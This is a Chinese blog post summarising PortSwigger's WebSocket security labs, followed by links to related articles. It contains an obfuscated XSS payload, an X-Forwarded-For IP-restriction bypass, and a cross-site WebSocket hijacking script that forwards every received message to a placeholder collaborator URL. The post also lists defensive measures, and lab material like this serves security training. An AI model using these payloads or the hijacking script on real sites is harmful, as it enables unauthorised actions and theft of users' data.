PortSwigger 基于 WebSocket 的安全漏洞

最新推荐文章于 2024-08-15 09:52:54 发布
最新推荐文章于 2024-08-15 09:52:54 发布
阅读量540 收藏
点赞数 1
文章标签: websocket 安全 网络协议 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42451330/article/details/129412009
版权

一、WebSocket 简单介绍  

        WebSockets广泛用于现代Web应用程序。它们通过 HTTP 启动,并提供具有双向异步通信的长期连接。

        WebSocket 用于各种目的,包括执行用户操作和传输敏感信息。事实上常规HTTP引起的任何Web安全漏洞也可能与WebSockets通信有关。

二、WebSocket 漏洞利用过程

        1、操纵 WebSocket 消息以利用XSS漏洞

        2、操纵 WebSocket 握手通过混淆利用XSS漏洞

                某些 WebSocket 漏洞只能通过操纵 WebSocket 握手来发现和利用。

                   (1)绕过IP限制:X-Forwarded-For: 1.1.1.1

                   (2)采用混淆进行绕过:<img src=1 oNeRrOr=alert`1`>

        3、通过跨站点漏洞 WebSocket 劫持             

    如果 WebSocket 握手请求容易受到 CSRF 的攻击,则攻击者的网页可以执行跨站点请求以在易受攻击的站点上打开 WebSocket。攻击中接下来发生的情况完全取决于应用程序的逻辑以及它如何使用 WebSocket。攻击可能涉及:

    (1)发送 WebSocket 消息以代表受害用户执行未经授权的操作。
    (2)发送 WebSocket 消息以检索敏感数据。

<script>
    var ws = new WebSocket('wss://your-websocket-url');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

三、WebSocket 漏洞防御措施

        1、使用协议(基于 TLS 的 WebSockets)。wss://
        2、对 WebSockets 终结点的 URL 进行硬编码,当然不要将用户可控制的数据合并到此 URL 中。
        3、保护 WebSocket 握手消息免受 CSRF 的影响,避免跨站点 WebSocket 劫持漏洞。
        4、将通过 WebSocket 接收的数据视为双向不受信任的数据。在服务器端和客户端安全地处理数据,以防止基于输入的漏洞,例如 SQL 注入和跨站点脚本。

什么是同源策略?如何检测跨站点 WebSocket 劫持漏洞?post 表单跳转跨域问题、Ajax跨域请求、浏览器特性和安全策略、WebSocket 协议连接
代码讲故事
03-04 604
什么是同源策略?如何检测跨站点 WebSocket 劫持漏洞?post 表单跳转跨域问题、Ajax跨域请求、浏览器特性和安全策略、WebSocket 协议连接。
渗透测试/漏洞赏金/src/黑客自学指南
2301_79205724的博客
08-30 671
在此方法论中我们的目标范围仅是一个域名或一个子域名,因此你应当针对你测试范围内的每一个不确定其web服务的域名,子域名或ip进行测试
即时通讯安全:跨站点WebSocket劫持漏洞
蔚可云的博客
08-19 914
尽管 WebSocket 协议设计时充分考虑了安全保障机制,但随着 WebSocket 技术推广,安全工作者们慢慢还是发现了一些 WebSocket 相关的安全漏洞,譬如 Wireshark 的漏洞 CVE-2013-3562 (Wireshark 1.8.7 之前的 1.8.x 版本中的 Websocket 解析器中的 epan/dissectors/packet-websocket.c 中的‘tvb_unmasked’函数中存在多个整数符号错误,远程攻击者可通过恶意的数据包利用这些漏洞造成拒绝服务)。
跨域使用websocket_浅谈 WebSocket 跨域劫持漏洞(CSWSH)
weixin_35391232的博客
01-15 262
原文首发在圈子社区:https://secquan.org/Discuss/1069086WebSocket 跨域劫持漏洞WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。了解WebSocketWebsocket 优点支持双向通信,实时性更强。更好的二进制支持。较少的控制开销。连接创建后,ws客...
Apache Tomcat WebSocket 漏洞利用教程
最新发布
gitblog_01054的博客
08-15 420
Apache Tomcat WebSocket 漏洞利用教程 CVE-2020-13935项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2020-13935 项目介绍 Apache Tomcat 是一个广泛使用的开源 Servlet 容器,用于托管 Java 应用程序。CVE-2020-13935 是一个关于 Apache Tomcat 的 WebSock...
渗透攻击实例-WebSocket攻击
logic1001的博客
04-04 1180
WebSocket是通过HTTP协议发起的一个双向全双工的通信协议。WebSocket协议被广泛用在现代WEB程序中用于数据流的传输和异步通信。跨站WebSocket劫持(也称为跨域WebSocket劫持)是一种由于WebSocket握手流程的安全缺陷所导致的跨站点请求伪造(CSRF)漏洞。当WebSocket握手请求仅依靠HTTP cookie进行会话处理并且不包含任何CSRF token或其他不可预测的值时,就会出现这种漏洞
WebSocket安全漏洞
Eason_LYC安全白帽子的成长博客
05-14 2578
websocket安全,网上讨论的不多,不是非安全方向,就是太晦涩就。本文正好适合初学者在熟悉websocket基础知识的同时,学习其安全技术,并有靶场进行练习,是绝佳的上手websocket安全漏洞挖掘的文章
burp靶场--WebSockets安全漏洞
qq_33168924的博客
01-24 1616
在Burp代理的HTTP历史记录选项卡中,找到WebSocket握手请求。观察请求是否没有CSRF令牌。凭据:carlos: fj83hbdbohtky68riu8b。右键单击握手请求并选择"复制URL"
关于对WebSocket通信安全概览
woshiyanfu的博客
09-28 102
WebSocket协议旨在取代使用HTTP作为传输层的现有双向通信技术,以从现有基础设施(代理、过滤、身份验证)中获益,因为HTTP最初并不打算用于双向通信,所以这项技术也被视为提高效率和可靠性之间的权衡。
WebSocket通信安全概览
stopys6的博客
09-22 1096
WebSocket协议旨在取代使用HTTP作为传输层的现有双向通信技术,以从现有基础设施(代理、过滤、身份验证)中获益,因为HTTP最初并不打算用于双向通信,所以这项技术也被视为提高效率和可靠性之间的权衡。
使用Burp Suite进行Android应用程序的渗透测试
通过模拟真实的攻击手法和方法,渗透测试能够帮助发现应用程序的安全漏洞和弱点,以便及时修复并加强系统的安全性。在日益增长的网络攻击威胁下,进行渗透测试已成为保护数据和应用程序安全的重要举措。 ## 1.2 ...
(十四)WebSockets安全漏洞
weixin_43047908的博客
04-18 1453
文章目录什么是WebSocketWebSockets漏洞发现处理WebSocket消息以利用漏洞操纵WebSocket握手连接以利用漏洞使用跨站点WebSocket利用漏洞如何保护WebSocket连接 什么是WebSocketWebSockets是通过HTTP发起的双向全双工通信协议。它们通常用于现代Web应用程序中以流式传输数据和其他异步流量。 Web浏览器和网站之间的大多数通信都使用HTTP。使用HTTP,客户端发送请求,服务器返回响应。通常,响应立即发生,并且事务完成。即使网络连接保持打开状态
前端websocket劫持漏洞(CSWSH)
god_Zeo的安全博客
01-28 2421
其实简单的将,这个很类与websocket版本的CSRF,同样的需要没有CSRF的token,然后利用这一点,发送一下敏感的请求,做一些敏感操作。
HTML5安全攻防详析之八:Web Socket攻击
aiwzwid2749的博客
11-24 182
HTML5限制了Web Socket可以使用的端口,但是,它可能会成为攻击者的载体。想象你打开一个页面,这个页面打开Socket连接并且执行一个内部IP地址的端口扫描。如果端口扫描发现了内部网络上发现了一个开启的80端口,一个隧道就可能通过你的浏览器建立。这样做会实际上最终绕过防火墙,并且允许访问内部内容。 HTML5的最好的功能之一WebSocket允许浏览器打开到特定IP目标端口的...
【burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
WebSocket概述极其漏洞解析
Zeker62的博客
08-24 813
目录什么是WebsocketWebsocket和HTTP区别Websocket如何建立WebSocket消息是怎样的?WebSocket安全漏洞操作WebSocket消息利用漏洞操纵 WebSocket 握手利用漏洞使用跨站 WebSockets 来利用漏洞如何保护 WebSocket 连接什么是WebsocketWebsocket是一种通信协议 通过HTTP发起的,全双工 用于现代We...
portswigger Authentication
07-28
然而,JWT也存在一些安全漏洞,其中一些与身份验证相关。引用\[1\]提到了一些JWT的实现缺陷,如没有正确验证签名、服务器密钥泄露等问题。引用\[2\]提到了一些可能存在的攻击,如注入自签名证书和JWT算法混乱。引用\...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值